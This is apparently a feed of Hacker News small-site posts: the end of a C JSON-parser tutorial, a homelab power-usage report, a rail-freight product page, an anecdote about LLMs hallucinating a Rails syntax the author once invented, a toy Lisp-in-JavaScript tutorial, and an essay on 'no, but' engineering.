            json_free_value(&json_value);
          }
          ASSERT(json->cur(json) == ',',
                 "expected , as separator between object key value pairs");
          json->advance(json);
        }
        ASSERT(json->cur(json) == '"',
               "expected a string as the object key, did not get that")
        char *key = string(json);
        ASSERT(json->cur(json) == ':', "expected object key and value separator");
        json->advance(json);

        struct json_value member = json->parse(json);
        json_value.values = realloc(json_value.values, sizeof(struct json_value) *
                                                           (json_value.length + 1));
        json_value.values[json_value.length] = member;
        json_value.object_keys = realloc(json_value.object_keys,
                                         sizeof(char **) * (json_value.length + 1));
        json_value.object_keys[json_value.length] = key;
        json_value.length++;
      }

      ASSERT(json->cur(json) == '}', "missing object end");
      json->advance(json);
      return json_value;
    }

Same as with arrays, only instead of a single atom we have a string as the key, : as a separator, and a json_value as the value. Each pair is separated with ,.
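To tie it all together, here is a hypothetical usage sketch - json_init is an assumed stand-in for however the struct json gets constructed earlier in the article, while parse, length, object_keys, values and json_free_value are the pieces used above (and <stdio.h> is assumed to be included):

C

// hypothetical usage; json_init is an assumed constructor name
struct json json = json_init("{\"name\": \"box\", \"tags\": [1, 2]}");
struct json_value root = json.parse(&json);

ASSERT(root.type == json_object, "expected an object at the top level");
for (size_t i = 0; i < root.length; i++)
  printf("key %zu: %s\n", i, root.object_keys[i]); // key 0: name, key 1: tags

json_free_value(&root);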

    ]]>
    https://xnacly.me/posts/2025/json-parser-in-c-with-methods/ hacker-news-small-sites-43222344 Sat, 01 Mar 2025 18:53:20 GMT
    <![CDATA[My Homelabs Power Consumption]]> thread link) | @ingve
    March 1, 2025 | https://dizzy.zone/2025/03/01/My-homelabs-power-consumption/ | archive.org

My homelab consists of 4 machines currently. When choosing them I tried to be energy conscious - using hardware which would not consume too much electrical power while still keeping the up-front cost low. These are mostly older systems, and I was unable to find decent power consumption numbers for them.

    The specs

    1x MSI Cubi 3 Silent NUC

    CPU Dual-core i5-7200U
    RAM 2×16GB

    2x Lenovo ThinkCentre M910 Tiny

    CPU Quad-core i5-6500T
    RAM 2×8GB

    1x Mostly second-hand NAS

    CPU Quad-core i5-4590T
    RAM 2×8GB
    Motherboard MSI H81I-S01
    PSU Silverstone ST30SF 300W
    Storage 4x2TB SSD - mixed, Samsung EVO 870 & Crucial MX500

    The setup

Since these are all currently plugged into Shelly smart plugs, I'm able to tell the power usage of each of them separately. Each plug measures the power consumption and reports it to EMQX via MQTT. From there, I have a custom Prometheus collector implemented: it subscribes to the relevant topics on EMQX and exposes a /metrics endpoint in the Prometheus exposition format. This is periodically scraped by netdata, which is running in the same cluster.
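In that format, each reading ends up as one gauge line per plug - something like power_watts{plug="cubi"} 12.4, where the metric and label names here are made up for illustration.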

    I created a dashboard in netdata which allows me to visualize the CPU usage of each machine and its power consumption. It looks something like this:

    The power consumption dashboard

    I’m not going to measure the consumption of the systems when they are idle as there are quite a few things running on my cluster and I wouldn’t like to interrupt them. However, I’ll show the current CPU usage and the power draw from the plug. The CPU usage is what I’d call steady in my homelab, it rarely spikes and seems to be pretty consistent across the board. We’ll call this the baseline.

    I’ll then do a 10 minute stress test using the stress tool on each machine, to see what the power consumption looks like at that moment.

    The results

Note that the CPU % shows the % of CPU used across all cores - 100% indicates that all cores are working at their max. The cost estimates assume a price of 0.211479 €/kWh - taken directly from my last bill - and treat a month as 30 days.

    Here are the results for the baseline:

    System CPU % Power Draw Estimated Monthly Cost
    Cubi 27% 12.4W €1.89
    Lenovo M910 Tiny 8% 7.3W €1.11
    NAS 4.5% 21W €3.20
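As a quick sanity check of the math, take the Cubi's baseline: 12.4 W × 24 h × 30 days = 8.928 kWh, and 8.928 kWh × 0.211479 €/kWh ≈ €1.89 - matching the table.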

    And for the full load test:

    System CPU % Power Draw Estimated Monthly Cost
    Cubi 100% 17.7W €2.70
    Lenovo M910 Tiny 100% 29.4W €4.48
    NAS 100% 39.9W €6.08

    Thanks for reading!

    ]]>
    https://dizzy.zone/2025/03/01/My-homelabs-power-consumption/ hacker-news-small-sites-43222320 Sat, 01 Mar 2025 18:50:25 GMT
    <![CDATA[Helrom Trailer Rail: roll-on/off system for transporting truck trailers by rail]]> thread link) | @Archelaos
    March 1, 2025 | https://en.helrom.com/technologie | archive.org

    OUR TECHNOLOGY

    A free ride for trailers by rail

    The globally patented Helrom trailer wagon is the fast, simple and flexible way to transport all types of truck trailers over long distances by rail.

Helrom can load 100 percent of all truck trailers onto rail.

    Innovative and barrier-free

    An innovative technology and an ingenious principle.

    A hauler drives his semi-trailer to our trailer hub. The trailer is decoupled from the tractor, the Helrom trailer wagon opens up at the side, the trailer is shifted onto the wagon and the wagon is re-closed – and that’s it. Once it reaches its destination, it is unloaded in the same way, coupled with its tractor and driven the last mile to its intended recipient.


    A barrier-free loading process for all trailers.

    We do not need any expensive loading terminals, no cranes and no craneable semi-trailers. A level ground next to the train track is all that’s required. We can get 100 percent of all truck trailers onto the tracks without any major outlay – this is a genuine revolution in freight transportation.

    A transport technology
    without terminals

Until now, loading both craneable and non-craneable truck trailers has required specialised loading facilities that take years to build and are very costly. Previous technological solutions have not been able to overcome this barrier. All conventional approaches mean inflexible route planning in the long term. A specialised terminal costing millions cannot be relocated if supply chains shift. This technological barrier has meant that only a very small proportion of truck trailers have been transported by rail to date.

     With the barrier-free Helrom trailer wagon, complex special terminals are a thing of the past. With the elimination of the large terminals, combined road and rail transport can now be realised quickly and easily for the first time.

    Today, only 2% of all trailers travel by rail.

    "Helrom Trailer Hubs can be set up anywhere where there is a track with an asphalted surface and a car park. We are really taking the combination of truck and rail to where it is needed."

    Bruno Weissmann
    Director of Sales, Helrom

    Are you interested in the Helrom transport service for block trains or open trains? Then get in touch with us. We will be happy to advise you.

    Net Zero Transport for the ecological transport transition

    The European climate targets cannot be achieved without shifting freight transport to rail. That is why it is our mission to realize a transport concept for the Net Zero Economy.

    More about Net Zero Transport

    A better type of rail transport

    With our transport service for truck trailers, greenhouse gas emissions and traffic congestion can be significantly reduced – with flexibility, reliability and operating costs that are comparable to road transport.

    More about our service

    We want to make a difference

    Reliability, safety, sustainability – from the train driver to the management, we have set ourselves clear principles. We work for better freight transport that is not only CO₂-neutral, but also faster and more reliable.

    More about our team

    ]]>
    https://en.helrom.com/technologie hacker-news-small-sites-43222044 Sat, 01 Mar 2025 18:25:45 GMT
    <![CDATA[Making o1, o3, and Sonnet 3.7 hallucinate for everyone]]> thread link) | @hahahacorn
    March 1, 2025 | https://bengarcia.dev/making-o1-o3-and-sonnet-3-7-hallucinate-for-everyone | archive.org

    A quick-fun story.

    My (ops-but-sometimes-writes-scripts-to-help-out) coworker just tapped on my shoulder and asked me to look at his code that wasn't working. It was a bit something like this:

    User.includes(investments: -> { where(state: :draft) })...

    This is not a feature of ActiveRecord or any libraries that I'm aware of. I asked him why he thought this was valid syntax, and he pulled up his ChatGPT history. It looked something like this:

    Ask: How can I dynamically preload an association with conditions in rails? (Potentially followed up with - no custom has_many associations, no preloader object, don't filter the base query, etc.)

Sometimes, you're routed to the correct answer: add the filter you want on the associated record as a standard where clause, and also add a .references(:association) to the query chain. Like so:

    User.includes(:investments).where(investments: { state: :draft }).references(:investments) 

    However, with just a few tests, you're usually routed to that bizarre, non-existent syntax of including a lambda as a keyword argument value to the association you want it applied to. I recreated this a few times below:

    o3-mini
    Sonnet 3.7
    Sonnet 3.5

    I was confused why the syntax "felt" familiar though, until my coworker pointed out I invented it while asking a question on the Rails forum two years ago.

    Exploring APIs

    Funny enough, my other "idea" in that thread is the other solution most LLMs hallucinate - accessing the Preloader object directly.

This doesn't work either

I didn't realize this when posting originally, but this still requires you to loop through the posts and load the query returned by the preloader into each post's association target. I didn't include that, and LLMs seem to be confused too.

    As far as I'm aware, that forum post is the only place that you'll find that specific syntax exploration. As my comment above denotes, it would not work anyway. Why I included it in the first place is beyond me - I'm working on making my writing more concise (which is why I carved out a section to explain that, and then this, and now this explanation of that....)

    Conclusion

    LLMs are really smart most of the time. But, once it reaches niche topics and doesn't have sufficient context, it begins to resemble myself early in my career. Open StackOverflow, Ctrl+C, Ctrl+V, Leeroy Jenkins style. I can't help but find it endearing.

    ]]>
    https://bengarcia.dev/making-o1-o3-and-sonnet-3-7-hallucinate-for-everyone hacker-news-small-sites-43222027 Sat, 01 Mar 2025 18:24:22 GMT
    <![CDATA[Lisp in Your Language]]> thread link) | @todsacerdoti
    March 1, 2025 | https://danthedev.com/lisp-in-your-language | archive.org

    I'm a fan of Lisp programming languages, but there's an incredible conceptual elegance that struggles to materialise as readable elegance for many unfamiliar programmers. The underlying concepts are incredibly simple, but the learning curve can represent a disproportionate challenge.

    Brief History

    Lisp is a derivation of the phrase List Processing. The fundamental idea of the language is that you represent your ideas and constructs as data structures, rather than with structured syntax. Specifically you represent them as lists.

    (print "Hello world!")
    • Use ( and ) to denote lists
    • Arguments are space separated
    • First item is a function
    • Remaining items are the arguments

Constructs you may be used to seeing implemented with special syntax or keywords suddenly become similar to the example above.

    (if (= 5 5)
      (print "Sanity!")
      (print "Insanity!"))

if is just a special function that evaluates a condition; if that condition is found to be true, it evaluates the second argument, otherwise it evaluates the third argument.

    These functions are often known as special forms. Core bits of syntax are often implemented as special forms, but there's nothing particularly special about them. You can implement them yourself using macros. Clojure (like many Lisps) implements many of the core constructs with macros.

    We've been writing code to manipulate data for a long time now. When your code is also data, you can write code to manipulate code just as easily.

    The essence of this wonder isn't Clojure though. It's not Racket or Scheme either. These are all just different incarnations of the code-as-data idea. These languages certainly aren't the only ones with functions and lists!

    What if we could write code-as-data in our language of choice?

    An Experiment

    There's a Lisp hidden in many popular programming languages, although it may take a bit of work to uncover it. You may have to do things you won't be proud of, but if you can think of a programming language with lists and higher-order functions, then it will be there. Take Javascript, for example.

    (print "Hello world!")

    What is stopping us from simply translating the syntax from the above example into Javascript?

    [alert, 'Hello world!']

    Nothing, except it doesn't do much. It returns an array that contains a function and a string. Just the way Lisp wants. But our Javascript runtimes aren't expecting us to be writing code this way. If it was possible to ask them to try and execute all arrays as though they were functions, there would be chaos.

    We're going to have to do a little bit of work to make this happen. Let's define an eval function which will interpret an expression.

function eval(expression) {
  // the first item is the function
  var fn = expression[0];

  // the rest are its arguments
  var args = expression.slice(1);

  // call the function with those arguments
  return fn.apply(null, args);
}

    And to see it in action:

eval([alert, 'Hello world!']); // => alerts 'Hello world!'
    

    That's it, we've implemented a (very minimal) Lisp. We can try out some other built-in functions too. From now on, the call to eval will be omitted from examples for brevity.

[parseInt, '4.41'] // => 4
[isNaN, 103]       // => false
[btoa, 42]         // => "NDI="

There's a good reason why our eval function won't work if you try it with console.log or document.write—they expect to be called with the right this, which our fn.apply(null, …) throws away—so stick to alert for now.

    Expressions All The Way Down

    From here on, we'll refer to the lists in our code as expressions. This helps distinguish them from list data structures. What happens when we try and evaluate an expression that already contains another expression?

    [alert, [prompt, "What is your name?"]]

    We get an alert that tries to alert the inner expression as though it was an array. We need to make our eval function understand that if it finds an expression as an argument, it should evaluate it as code, not data.

function eval(expression) {
  // the first item is the function
  var fn = expression[0];

  // evaluate the arguments
  var args = expression
    .slice(1)
    .map(function(arg) {
      // nested expressions are code, not data
      if(arg instanceof Array) {
        return eval(arg);
      } else {
        return arg;
      }
    });

  // call the function with the evaluated arguments
  return fn.apply(null, args);
}

    Now we've got some recursion in the mix, we're getting somewhere. This function will evaluate every array it finds, no matter how deep into the structure.

    [alert, [prompt, "What is your name?"]]

    Syntax & Names

    So far, so good, but how would we do Maths?

    [+, 5, 5]

    Like it or not, this is definitely going to give you a syntax error.

    One of the genuine benefits of picking a language that already understands Lisp is that the simplicity of the syntax leaves an abundance of characters to use as identifier names. For instance, in Clojure + is just the name of a function that happens to be responsible for adding numbers.

    When we want to borrow these transcendental concepts in our syntax heavy languages, we have to do some extra work.

    function add(a, b) {
      return a + b;
    }
    
[add, 5, 5] // => 10

    This is elegant for sure, but there's scope for more mischief here. Try this instead.

    ['+', 5, 5] 

    Let's define some native functions.

    var native = {
      '+': function(a, b) {
        return a + b;
      },
      '-': function(a, b) {
        return a - b;
      }
    };
    
[native['+'], 5, 5] // => 10

    This ends up feeling verbose, but some tweaks can alleviate it. Pass your native object to eval as a second argument.

function eval(expression, native) {
  // the first item is the function, or the name of a native function
  var fnName = expression[0];

  // look string names up in the native table
  var fn = typeof fnName === 'string' ? native[fnName] : fnName;

  // evaluate the arguments
  var args = expression
    .slice(1)
    .map(function(arg) {
      // nested expressions are code, not data
      if(arg instanceof Array) {
        return eval(arg, native);
      } else {
        return arg;
      }
    });

  // call the function with the evaluated arguments
  return fn.apply(null, args);
}

['+', 5, 5] // => 10

Hopefully, you're wondering why this doesn't feel like the zen of simplicity that is associated with Lisps. And you're right. It's not. But if you wanted simple, then you should ask yourself what on earth you're doing reading about implementing a makeshift lisp in an already confused programming language?

    This is a sandbox for us to do unreasonable things in. Missing out on these kinds of hacks would be a wasted opportunity. Go ahead and implement +, -, *, /, = and any other operators you think might be useful as native functions. We'll use them later on.

    Variables

    A language without variables would be difficult, so we'll implement them.

    function def(name, value) {
      window[name] = value;
    }
    
    [def, a, 5]

Our def function takes a variable name and a value to assign to it, then it binds it onto the window object—the global object in browser Javascript. However, there's a real elephant in the expression. We aren't responsible for resolving the values of variables within the expression. The Javascript implementation is going to do that for us.

    It will try to resolve the value of a. We haven't declared it, so it will throw an error. Or even worse, if we have declared it, but not initialised it, we'll end up with undefined as our name argument. Of course Javascript has an excellent way of dealing with this. Coerce undefined to a string, then use it as a key all the same (oh, Javascript...).

    Ah well. The obvious solution is to pass the name as a string instead.

    [def, 'a', 5]
    [alert, ['+', a, a]]

    Great, except it still doesn't work. The second expression is evaluated by the runtime before we get a chance to interpret the first. How did we solve this last time? Use strings instead.

    Scope

    [def, 'a', 5]
    [alert, ['+', 'a', 'a']]

Now we have to try and resolve every string argument as a variable. We're also going to have to do the same with functions, so that we can use variables as the first item in lists.

Let's bite the bullet and introduce a simple scope, then have all strings refer to values within it. If a string doesn't refer to a value, then we'll just use its raw value.

    Instead of accepting the native object as a second argument, accept a scope object instead. This way, we can pass our native object in as the root scope object and nothing will break.

function eval(rawExpr, scope) {

  // primitives evaluate to themselves
  if(!(rawExpr instanceof Array)) {
    return rawExpr;
  }

  // default to an empty scope
  scope = scope || {};

  // resolve each symbol that names a value in the scope
  var expression = rawExpr.map(function(symbol) {
    if(symbol in scope) {
      return scope[symbol];
    } else {
      return symbol;
    }
  });

  // the first item is the function
  var fn = expression[0];

  // evaluate the arguments
  var args = expression
    .slice(1)
    .map(function(arg) {
      // nested expressions are code, not data
      if(arg instanceof Array) {
        return eval(arg, scope);
      } else {
        return arg;
      }
    });

  // call the function, exposing the scope as `this`
  return fn.apply(scope, args);
}

    We used the first argument of .apply to expose the scope as this to each of our functions. We'll define a new, native version of def to show this in action (excuse the pun).

    var native = {
      def: function(name, value) {
        return this[name] = value;
      },
      print: console.log.bind(console)
    };

We can also add a print method, just in case you were fed up with using alert. Let's test that out.

['print', ['def', 'a', 5]] // logs: 5

    It may not be the most beautiful code you've ever seen, but it works.

    Special Forms

    We've got evaluable expressions, but we don't have any way to control them. There's no sense of a conditional statement, a function, or even a way to execute multiple expressions at once.

    Our eval function currently tries to interpret every expression it sees. We'll have to denote that some functions are special forms that will handle the evaluation of their own arguments.

function SpecialForm(fn) {
  // mark the function so that eval leaves its arguments unevaluated
  fn.__isSpecialForm__ = true;
  return fn;
}

    Then we'll tweak the eval function, to prevent it from evaluating expressions that are arguments to a special form.

    
    
// the first item is the function
var fn = expression[0];

// evaluate the arguments, unless the function is a special form
var args = expression
  .slice(1)
  .map(function(arg) {
    if(arg instanceof Array && !fn.__isSpecialForm__) {
      return eval(arg, scope);
    } else {
      return arg;
    }
  });
    

    Do

    Let's test out our new special forms and implement do. It evaluates all of its arguments, which allows us to evaluate multiple expressions in series.

    In traditional Lisp:

    (do
      (print "Hello")
      (print "World!"))

    We'll add it as a new native function.

var native = {
  'do': SpecialForm(function() {
    var exprs = [].slice.call(arguments);
    // evaluate each expression, returning the value of the last one
    return exprs.reduce(function(_, expr) {
      return eval(expr, this);
    }.bind(this), null);
  })
};

    We can also do a nice trick with reduce to make sure that the value of the last expression is returned.

Let's translate the example above to our new syntax and watch it run.

['do',
  ['print', 'Hello'],
  ['print', 'World!']]
// logs: Hello
// logs: World!
    
    
    

    If/Else

    What good is a programming language without conditionals? The next challenge is implementing if statements. However—with our new special forms—it should be trivial.

var native = {
  if: SpecialForm(function(condition, success, failure) {
    var passed = eval(condition, this);
    return eval(passed ? success : failure, this);
  })
};

    That's it. if/else in 3 lines of code.

['if', ['=', 3, 3],
  ['print', 'true'],
  ['print', 'false']]
// logs: true
    
    

    If this is your first time implementing a Lisp, this should be a special moment. You have implemented conditional control flow as data.

    Functions

    Functions are the last hurdle between here and having a language that can actually do things. However, it's quite a hurdle.

    Here's what they look like in more conventional Lisps.

    (def shout
      (fn [name planet]
        (print planet name)))

    This is actually an anonymous function being bound to a local variable with def. We already have an implementation of def so all we need now is an implementation for fn.

    Let's break down the arguments to fn.

The first one is a list of argument names and the second one is the expression (or function body).

var native = {
  fn: SpecialForm(function(defArgs, expr) {
    return function() {
      var callArgs = arguments;

      // create a child scope that inherits from the calling scope
      var childScope = Object.create(this);

      // bind each declared argument name to the value the function
      // was actually called with
      defArgs.forEach(function(argName, index) {
        childScope[argName] = callArgs[index];
      });

      // evaluate the function body in the child scope
      return eval(expr, childScope);
    }
  })
};

    There it is. Dynamic binding into a lexical scope. Can we just take a moment to agree that prototypal inheritance rocks, too?

['do',
  ['def', 'shout',
    ['fn', ['planet', 'greeting'],
      ['print', 'greeting', 'planet']]],
  ['shout', 'hello', 'world']]
// logs: world hello
    
    

    This could definitely be less verbose, so we can take a hint from some other Lisps and create defn too.

    var native = {
      defn: SpecialForm(function(name, args, expr) {
        var fn = native.fn.call(this, args, expr);
        return native.def.call(this, name, fn);
      })
    };

    We simply tie together our existing implementation of def with fn.

['do',
  ['defn', 'shout', ['planet', 'greeting'],
    ['print', 'greeting', 'planet']],
  ['shout', 'hello', 'world']]
// logs: world hello
    
    

    Much better.

    Once a language has functions, the sky is the limit.

    ["defn", "fib", ["n"],
      ["if", [">", "n", 1],
        ["+",
          ["fib", ["-", "n", 1]],
          ["fib", ["-", "n", 2]]],
        1]]

No self-respecting functional programming demo comes without a horribly inefficient, non-memoized recursive Fibonacci implementation. This one is no exception.

    ["print", ["fib", 8]]
    

    Considerations

    You might have noticed that our code is completely JSON compliant. We use primitives and lists. This means we can actually use JSON as source files for our language.

    What? You mean we can embed a language with first class functions inside JSON? Yeah, we can.

    Our language is still very short on the ground in terms of a standard library. We haven't really considered data structures, namespaces, exceptions, debugging or macros either.

    Conclusion

I'm putting together an implementation of this Javascript Lisp, along with a REPL and a growing set of native functions, on Github. Feel free to use it as a reference. It's important to remember that this is a toy—a sandbox for learning. It's not meant to be taken seriously and it certainly shouldn't be used in any real systems. It's inefficient and insecure.

    Here's a short video of the REPL in action.

    More than anything else, implementing a programming language—no matter how small or strange—is a great way to learn about the language you implement it in. Language design in general is a fairly eye-opening experience and hopefully this has also helped open your eyes to the simple, yet powerful nature of Lisps.

    I'll revisit this language again in the future, to talk through the process of implementing macros, then we'll move as much native code as possible inside the language.

    Now open your editor and do this again in another language, then tweet me when you're done!

    ]]>
    https://danthedev.com/lisp-in-your-language hacker-news-small-sites-43222017 Sat, 01 Mar 2025 18:23:37 GMT
    <![CDATA[The "No, but" Engineer]]> thread link) | @herbertl
    March 1, 2025 | https://www.scottsmitelli.com/articles/no-but-engineer/ | archive.org

    When I was about 21 years old, I signed up for a one-day improv workshop in New York City.

The extent of most people’s knowledge of improvisational comedy probably begins and ends with Whose Line Is It Anyway?, a television show that premiered in the UK during the late 1980s and, as of this writing, broadcast new episodes on The CW within the last few months. During the show’s original run in the US, then-current host Drew Carey was described as a man who “pretends to laugh at guys pretending to improvise.” Jimmy Kimmel, The N.Y. Friars Club Roast of Hugh Hefner (2001) Whether that allegation was fair or not, I can’t say. But I can say that, if you are familiar with the show, you would also be familiar with the way our workshop was run.

    Improv isn’t just a collection of screaming jackasses; there are actually a number of rules that each performer should abide by to make the scene work well. Most of these rules boil down to two things: 1) always add new information, and 2) always accept and respect the information added by others in the scene.

    If one performer exclaims something like:

    “Wow, I can’t believe I made it to a major league baseball stadium! Hey, it’s all-star hitter Neil Blatz!”

    The worst thing the next performer could do is say:

    “No, this is a pet store and you just let all the hamsters out!”

    That’s selfish. It disrespects the premise and the other performers in the scene who worked to put it together. It destroys the momentum of the entire show and kills the audience’s enthusiasm. It basically wrecks the whole afternoon.

    The shortest way to express the rules? “Yes, and…”

    In the workshop we did, I was paired up with another first-timer named Remmy. I think that’s how his name was spelled. With the help of a suggestion from the rest of the group and a bit of yes-anding between the two of us, we arrived in a scene where I was a stern representative from the company’s HR department and he was an employee coming to my office to discuss the latest complaint lodged by his coworkers.

    As the scene progressed, we arrived at the premise that he was way, way too into the Magic: The Gathering card game and would talk incessantly about it to the point where it was harming productivity. I responded yes, and this has been causing a tremendous amount of paperwork for everyone in HR. He then turned his attention to me, where he began prattling off such extremely specific details about the cards and their relative capabilities that I was quite sure he was bringing a deeply authentic part of his actual self into the character. I knew virtually nothing about the game, but I responded to each of his details with increasingly absurd commentary of my own. Yes, and then Joe barricaded himself in the supply closet. Yes, and then half the office quit. Yes, and now I’m the only member of HR that hasn’t run away screaming; it has been a tremendous amount of paperwork.

    From the front row of the audience, the workshop leader held three fingers in the air. This was our signal that we had about 30 seconds if we wanted to try to wrap the scene up.

    Remmy was still going on about all the different cards, so I slowly turned away, climbed up on the chair, and mimed tying a noose around my neck. I closed my eyes, stepped off the chair, then stood swaying with my tongue stuck out. If you had told me prior to that day that I would get up in front of a room full of strangers, act out an imaginary suicide by hanging, and that I would be rewarded with laughter for doing so, I’m not so sure I would’ve believed you.

    I felt a tap on my shoulder. I turned and opened one eye to see Remmy, who had stopped talking. He extended an invisible stack of something, then delivered the final line of the scene: “Don’t forget your paperwork.”

    Remmy, if you’re out there reading this, thanks for being such a solid scene partner.

    The rules of improv work quite well when you’re making up a comedy scene. They permit each participant the freedom to propose something potentially ludicrous, but with the guaranteed assurance that their contribution will not be rejected. It’s a remarkably safe and supportive environment, and actually one of the least frightening forms of acting that an anxious or shy person can dip their toes into. The yes-and framework lays the groundwork for completely absurd and potentially hilarious situations to blossom. This is exactly what you want in a comedy scene.

    This is precisely the opposite of what you want on your engineering team.

    Guilty as charged

    People go into tech for a variety of reasons. Some see the allure of easy money, others feel as though it may be one of the lazier paths through life. But for a number of us, the motivation is a desire to be useful. Something inside compels us to always look for problems to solve, processes to improve, or simply things to do. The word “useful” is a very deliberate choice; it does not automatically imply that the work is helpful. Perhaps you are the best baker in your social group. That’s an extremely useful skill in the abstract. But when you’re all trapped together inside a stalled elevator car, it is not very helpful. It can be very easy to fall into a trap where it feels like you’re wasting a lifetime of study and practice by not using your knowledge and skills at every possible opportunity. It’s an extremely hard switch to turn off.

    Most teams of any appreciable size have a couple of members with this kind of energy. When harnessed well and directed effectively, they can be extremely self-sufficient and productive. They’ll soldier through the thorniest problems to find answers. They will move mountains if given the opportunity. However, get a couple of them together in a conference room without appropriate supervision and they can yes-and each other to unimaginably unhinged designs.

    This has a tendency to react with another rather unfortunate background element in many workplaces: boredom. Whether we like to admit it or not, a whole bunch of us spend way too many of our days working below our abilities. We have the capacity to calculate rocket trajectories, tackle CPU pipeline hazards, improve open-source libraries that run on hundreds of millions of systems… yet we’re just sitting here bolting another authorization check onto some miserable CRUD app, or trying to shave a tenth of a second off of some ad’s load time. We get bored, then we get antsy, then we go looking for problems to solutionize, then we over-engineer. Pain follows shortly thereafter.

    In some ways, the industry actually encourages this. For every piece of software written for fun and released in the spirit of fostering goodwill, there are dozens of other essentially-identical components written as works-for-hire that have been jealously guarded by the companies that commissioned them. Think of how many different e-commerce checkout pages you’ve interacted with, and how they’re all basically the same yet subtly different, like little crappy snowflakes that are each uniquely awful in their own special way. Think of how many account creation and password reset flows you’ve dealt with, how many person-hours have been spent reimplementing duplicate after duplicate of substantially the same thing. At this point it really should be classified as pointless busywork.

    But if it keeps us from getting too much free time to conjure up something even worse, hell, maybe it’s actually the better use of time.

    No, but…

    If the intention of “yes, and” is to kite a given situation to newer and increasingly absurd heights, then “no, but” implies the exact opposite: a default position of rejecting the proposal while simultaneously offering an acceptable substitute. Sort of like the mean mother in the “We Have Food at Home” meme. In a room full of yes-ands, a single well deployed no-but can bring the conversation back down to reality. It is sometimes difficult and often unrewarding, but an incredibly powerful skill to hone.

    It should go without saying that the “but” is just as important as the “no.” You don’t want to earn the reputation of being an unsupportive jerk who shoots everything down for no good reason. The Bastard Operator from Hell is not a role model, is what I’m saying. The “no” always comes from a place of rationality, while the “but” serves to share that perspective with others. The heart of the no-but philosophy is a genuine belief that the solution being discussed is not the correct one, paired with an alternative option that is either simpler, cheaper, faster to implement, or superior in some other meaningful way.

    Both halves of this response are difficult. The “no,” if deployed indelicately, can lead to unpleasant responses from those who feel deeply invested in the idea or approach they were proposing. Sometimes we put too much of ourselves into our work, and having ideas rejected can easily feel like a personal rejection as well. Instead, a simple redirection in the form of “what about…” or “didn’t we already have…” or “wouldn’t it be more effective to…” can allow the no-but engineer to elide the “no” part entirely. There are dozens upon dozens of ways to phrase it, and doing it well can defuse a situation before it starts.

    As for the “but,” that requires hard work over a long time. There’s no special life hack you can employ to accelerate the process. It takes a solid understanding of the problem space, any off-the-shelf solutions that may be applicable to the discussion, some degree of practical experience in using those existing solutions, and a reasonably clear insight into the specifics of the organization and what it values. If some other team has tackled this issue, what did they choose and how did it work for them?

    Together, the no-but approach serves to deter that immediate knee-jerk response of “I see a problem, time to immediately roll up my sleeves and go, go, go!” The no-but approach is very much “stop, look around, think.” In any given moment, faced with some new and exciting perceived problem, it’s incredibly easy for a yes-and engineer to forget to do that.

    An apparently rare breed

One would think that an employee with seniority—either a literal senior engineer, or principal/lead/staff level—would exhibit these traits. In my experience this is not automatically true. I don’t have a ready explanation for why this is. Perhaps it’s not something that management looks for during the promotion cycle. Maybe it’s because this industry has a habit of slapping the “senior” label onto staff who are barely three years out of college. Yeah yeah, “meritocracy” and all that. You’re telling me that a 26-year-old has met all the qualifications to shoot to the very top of the individual contributor ladder at this organization? That seems, I don’t know, preposterously quick. Fact is, engineers at every level seem to be more than willing to jump headlong into these tangled messes of their own making.

An effective no-but engineer possesses a healthy mix of experience and insight, paired with a probably-unhealthy mix of skepticism and distrust. Those are hard things to identify sometimes, and they don’t really lend themselves to any sort of curriculum for self-study. There are some traits, though. Perhaps they can help you tune in to the no-but wavelength.

    The no-but engineer:

    Is not a dickhead. If there is one single piece of advice I wish I could give to everybody at every level, I would simply advise them to not be dickheads to each other. Nobody needs that toxicity in their life; it is counterproductive at best and can absolutely trash team morale. If it really permeates the culture, everybody ends up being a dickhead to everybody else and the whole place goes to hell. Don’t be a dickhead. Don’t work with or for dickheads either, if you can avoid it.

    Is tactful. It’s easy to blurt out whatever might pop into your head, but it’s important to always be cognizant of how that expression will be received by those around you. Sometimes the way something is said is more important than the actual substance of the message. And sometimes—not always, but sometimes—the best course of action is simply to say nothing at all.

    Is well aware of the broader organization, its needs, strengths, and bottlenecks. It can be easy to think of your team and its direct stakeholders as your entire known universe, but you all exist within a larger organization that has objectives and problems. The no-but engineer is well-poised to notice cases where the team seems to be moving in a direction that doesn’t help reach an organizational goal. Further, the no-but engineer is at least somewhat aware of the expertise and institutional knowledge available from other teams. There’s a good chance that somebody on the same payroll has something to offer.

    Knows what’s going on under the hood. Just as important as understanding the organization as a whole, it’s also very important that the no-but engineer has a deep understanding of the technologies and practices used by the team. This can help cut through the fog of higher-level arguments and come to the realization that it’s all just different ways of pumping the same bytes through the same TCP socket. They are well aware of what’s in the language’s standard library. They know which third-party packages they would reach for when necessary. They know what kinds of tasks to avoid touching with ten-foot poles.

    Has seen some things. Wide-ranging experience gives a substantial amount of perspective. It becomes easier to see patterns as you live through more and more situations. If the goal is to be able to identify instances where history is repeating itself, it would be a good idea to be well versed in those historical events. This also helps build empathy, and the ability to step into a different individual’s shoes and perceive the situation as they do. Sometimes it’s helpful to simply think back and recall times when you yes-anded yourself into something regrettable, how that felt in the moment, and what you wish somebody had said to you at the time. Sometimes a mildly traumatic experience outside of a work environment can help with this kind of perspective. I once had a fluorescent tube burst in my face. Now I’m not afraid of CMake. True story.

    Is pragmatic. The no-but engineer accepts that sometimes it’s better to copy/paste a 50-line function rather than set up another goddamn private Git repository with another goddamn deployment key that we’ll have to keep remembering to rotate for-goddamn-ever.

    Does not seek glory, and accepts responsibility for failures. Part of this ties nicely into not being a dickhead. This is not the kind of work that should be undertaken by those looking for a way to stroke their own ego. When successes come, the praise goes to the team. When things go south and fingers start pointing, the no-but engineer doesn’t try to argue, deflect, or gaslight anybody into thinking it was somebody else’s fault. If they screwed up, they screwed up. Learn and move forward. It should also go without saying, but “I told you so” is never anything that anybody wants to hear after a failure.

    Hears what others mean, not just what they say. This is sort of the inverse of the tactfulness trait. Sometimes requesters don’t know what they want. Sometimes they know what they want but they don’t know how to phrase it. Perhaps they’re afraid of flat-out asking for something, so they dance around it. The no-but engineer knows how to set aside the letter of the request while looking for the spirit of it. Restating this interpretation back to the requester thus frees them from the responsibility of having to have done that difficult bit themselves. Lightly pushing back on a complicated thing and offering a more manageable substitute might save a huge amount of not-that-necessary-in-hindsight extra effort.

    Is absolutely not a “rockstar” in terms of productivity. The no-but engineer would probably confess that they don’t have any idea what they’re doing half the time. Of course this is probably not objectively true. What’s likely actually happening is, the no-but engineer has a long list of topics they’re quite sure they don’t know enough about. It’s good to be aware of your own limitations, and impostor syndrome is a real devil sometimes. The best benefit the no-but engineer could bring would be to convince people (including themselves) to not write any code if they can avoid it. Code is a liability. Eradicate it whenever you can.

